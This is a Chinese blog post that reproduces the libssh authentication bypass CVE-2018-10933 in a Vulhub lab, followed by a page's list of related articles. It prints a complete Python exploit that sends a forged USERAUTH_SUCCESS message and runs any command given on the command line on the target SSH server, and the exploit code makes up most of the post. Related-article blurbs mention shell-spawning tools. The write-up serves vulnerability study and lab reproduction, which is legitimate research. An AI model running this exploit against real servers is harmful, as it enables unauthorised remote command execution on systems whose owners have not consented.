libssh 服务端权限认证绕过 CVE-2018-10933 漏洞复现

最新推荐文章于 2024-04-17 09:56:14 发布
最新推荐文章于 2024-04-17 09:56:14 发布
阅读量2.1k 收藏 4
点赞数 1
分类专栏: 漏洞复现 文章标签: CVE-2018-10933 libssh libssh服务端权限认证绕过 安全 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/116377032
版权

libssh 服务端权限认证绕过 CVE-2018-10933 漏洞复现

一、漏洞描述

libssh 是一个提供 SSH 相关接口的开源库,包含服务端、客户端等。其服务端代码中存在一处逻辑错误,攻击者可以在认证成功前发送MSG_USERAUTH_SUCCESS消息,绕过认证过程,未授权访问目标 SSH 服务器。

二、漏洞影响

libssh 0.6 及更高版本具有身份验证绕过漏洞。
libssh 版本 0.8.4 和 libssh 0.7.6 已发布,以解决此问题。

三、漏洞复现

1、环境搭建

使用 Vulhub 在服务器上搭建:

cd /vulhub/libssh/CVE-2018-10933
docker-compose up -d

其默认开放在2222端口,可以使用 SSH 连接,默认用户名:myuser,默认密码:mypassword
在这里插入图片描述

2、漏洞复现

因其正常连接需要输入密码,使用 EXP 向服务器显示SSH2_MSG_USERAUTH_SUCCESS消息
代替服务器等待的SSH2_MSG_USERAUTH_REQUEST消息,以达到无登录凭据认证:

python3 ssh_poc.py 1.1.1.1 2222 'whoami'

在这里插入图片描述

四、漏洞POC

#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048


def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        client = transport.open_session(timeout=10)
        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()
        error = stderr.read()

        stdout.close()
        stderr.close()

        return (output+error).decode()
    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None


if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))

五、参考链接

https://www.libssh.org/security/advisories/CVE-2018-10933.txt
https://gist.github.com/0x4D31/35ddb0322530414bbb4c3288292749cc

Senimo_
关注
专栏目录
CVE-2018-10933 身份验证绕过漏洞验证
玄道的网安博客
10-28 6891
0x00 事件背景 2018-10-16 libssh发布更新公告旨在解决CVE-2018-10933的问题 libssh版本0.6及更高版本在服务端代码中具有身份验证绕过漏洞。 通过向服务端提供SSH2_MSG_USERAUTH_SUCCESS消息来代替服务端期望启动身份验证的 SSH2_MSG_USERAUTH_REQUEST消息,攻击者可以在没有任何凭据的情况下成功进行身份验证。 进而可...
利用Vulnhub复现漏洞 - libssh 服务端权限认证绕过漏洞CVE-2018-10933
JiangBuLiu的博客
07-12 1893
libssh 服务端权限认证绕过漏洞CVE-2018-10933)Vulnhub官方复现教程漏洞原理复现过程启动环境PoC (pocsuite 插件)执行任意命令 Vulnhub官方复现教程 https://github.com/vulhub/vulhub/blob/master/libssh/CVE-2018-10933/README.zh-cn.md 漏洞原理 libssh是一个提供ssh相...
libssh 服务端权限认证绕过漏洞CVE-2018-10933
EC_Carrot的博客
07-08 762
漏洞简介 libssh是一个提供ssh相关接口的开源库,包含服务端、客户端等。其服务端代码中存在一处逻辑错误,攻击者可以在认证成功前发送MSG_USERAUTH_SUCCESS消息,绕过认证过程,未授权访问目标SSH服务器。 漏洞复现 我们直接用Poc来复现: 来源于:https://github.com/vulhub/vulhub/tree/master/libssh/CVE-2018-10933 #!/usr/bin/env python3 import sys import paramiko impo
libssh 认证绕过漏洞(cve-2018-10933)分析
whatday的专栏
08-25 2059
最近出了一个libSSH认证绕过漏洞,刚开始时候看的感觉这洞可能挺厉害的,然后很快github上面就有PoC了,msf上很快也添加了exp,但是在使用的过程中发现无法getshell,对此,我进行了深入的分析研究。 前言 360发了一篇分析文章,有getshell的图: Python版本的PoC到Github上搜一下就有了: https://github.com/search?utf8=%E2%9C%93&q=CVE-2018-10933&type= 环境 libSSH-0.
libssh 服务端权限认证绕过(CVE-2018-10933)
m0_65150886的博客
12-27 420
相关接口的开源库,包含服务端、客户端等。其服务端代码中存在一处逻辑错误,攻击者可以在认证成功前发送MSG_USERAUTH_SUCCESS消息,绕过认证过程,未授权访问目标 SSH 服务器。官方已发布不受影响版本。已修复版本Libssh 0.8.4和0.7.6下载链接如下:https://www.libssh.org/files。2.poc利用,python poc.Sh ip port ‘命令’注意:使用OpenSSHSSH服务不受影响。1.访问ip:port,显示无法使用此页面。
K8 weblogic-CVE-2018-2628-getshell工具
07-13
【K8 weblogic-CVE-2018-2628-getshell工具】是一款针对Oracle WebLogic服务器的渗透测试工具,主要用于检测和利用CVE-2018-2628安全漏洞获取服务器的shell控制权。这个工具集成了漏洞的详细利用过程,包括图片教程...
libssh2 整数溢出漏洞 (CVE-2019-17498)的分析
systemino的博客
11-07 880
0x01 漏洞挖掘 在2019年3月18日,Canonical Ltd.的Chris Coulson披露了libssh2中的九个漏洞CVE-2019-3855至CVE-2019-3863)。这些漏洞已在libssh2 v1.8.1中修复。当时,我的同事Pavel Avgustinov注意到,修复漏洞的报告在LGTM上引入了多个新告警。这些告警是由于像下面的代码: if((p_len=...
linux下的ssh客户端,基于libssh2:连接ssh服务器,发送命令,并获取返回的结果
10-21
linux下的ssh客户端,基于libssh2:连接ssh服务器,发送命令,并获取返回的结果。 纯c代码,可gcc直接编译。
CVE-2018-10933:使用CVE-2018-10933LibSSH)无需任何凭据即可生成shell
03-02
libSSH身份验证-绕过 使用CVE-2018-10933无需任何凭据即可生成shell 漏洞数据库: : libSSH有关CVE-2018-10933的信息: ://www.libssh.org/security/advisories/CVE-2018-10933.txt libSSH发行的Bugfix: ://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/ 用法 // If paramiko==2.0.8 doesn't works try : pip install paramiko==2.4.2 pip install -r requirements.txt python libsshauthbypass.py --help Example: python l
libssh2.lib libssh2.dll以及头文件 版本:1.7.0
05-28
libssh2.lib libssh2.dll以及头文件 版本:1.7.0 编译环境:win10 vs2015 基于当前最新版本。动态链接,提供lib文件以及对应头文件。研究了很久所以资源分较高
libssh2.zip
07-26
[root@sdw1 ~]# rpm -qa|grep libssh2 卸载 [root@sdw1 libssh2]# rpm -e --nodeps libssh2-1.4.3-10.el7_2.1.x86_64 上传版本包并安装 [root@sdw1 libssh2]# rpm -ivh libssh2-1.4.3-12.el7.x86_64.rpm [root@sdw1 libssh2]# rpm -qa|grep libssh2
openssh kex.c拒绝服务漏洞漏洞CVE-2016-8858)处理
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
05-23 858
该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。代码修复链接如下:http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/kex.c#rev1.127。补丁下载:http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/kex.c。更多参看:https://cve.mitre.org/cgi-bin/cvename.cgi?
buuctf [Libssh]CVE-2018-10933
qq_1873822的博客
03-27 365
漏洞描述 2018-10-16 libssh发布更新公告旨在解决CVE-2018-10933的问题 libssh版本0.6及更高版本在服务端代码中具有身份验证绕过漏洞。 通过向服务端提供SSH2_MSG_USERAUTH_SUCCESS消息来代替服务端期望启动身份验证的 SSH2_MSG_USERAUTH_REQUEST消息,攻击者可以在没有任何凭据的情况下成功进行身份验证。 进而可以进行一些恶意操作。 https://blog.csdn.net/xuandao_ahfengren/article/deta
libssh
weixin_30767835的博客
10-18 576
1.SSH概念 ssh(secure shell),安全外壳协议,由IETF的网络小组所制定。ssh为建立在应用层基础上的安全协议。SSH是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用SSH协议可以有效防止远程管理过程中的信息泄露问题。SSH最初是UNIX系统上的一个程序,后来迅速扩展到其他操作平台。SSH在正确使用时可以弥补网络中的漏洞。 1.1 ssh功能 传统的网络...
vulhub漏洞复现36_Libssh
weixin_44193247的博客
02-08 659
vulhub漏洞复现练习篇
探索CVE-2018-10933:一个开源的安全研究与学习平台
最新发布
gitblog_00052的博客
04-17 342
探索CVE-2018-10933:一个开源的安全研究与学习平台 项目地址:https://gitcode.com/blacknbunny/CVE-2018-10933 在网络安全的世界里,了解并应对漏洞是至关重要的。今天,我们将深入探讨一个开源项目,它专注于研究和学习一个特定的漏洞——CVE-2018-10933。该项目由GitHub上的用户blacknbunny创建,旨在帮助技术爱好者、安全研究...
CVE-2014-9222
07-28
CVE-2014-9222是一种安全漏洞,攻击者可以利用该漏洞通过路由管理协议TR-069的7547端口发送恶意流量来控制设备。\[2\]这个漏洞的存在使得攻击者能够绕过身份验证并执行未经授权的操作。\[3\]如果你想进一步了解这个漏洞的详细信息,你可以使用Metasploit框架中的auxiliary/scanner/ssh/libssh_auth_bypass模块进行交互。\[1\] #### 引用[.reference_title] - *1* *3* [ctf:kali2:扫描ssh端口版本尝试auxiliary/scanner/ssh/ssh_version](https://blog.csdn.net/viviliving/article/details/128254919)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [近十万台路由器组成僵尸网络,专门向WordPress网站发起撞库攻击](https://blog.csdn.net/weixin_34293059/article/details/90356748)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值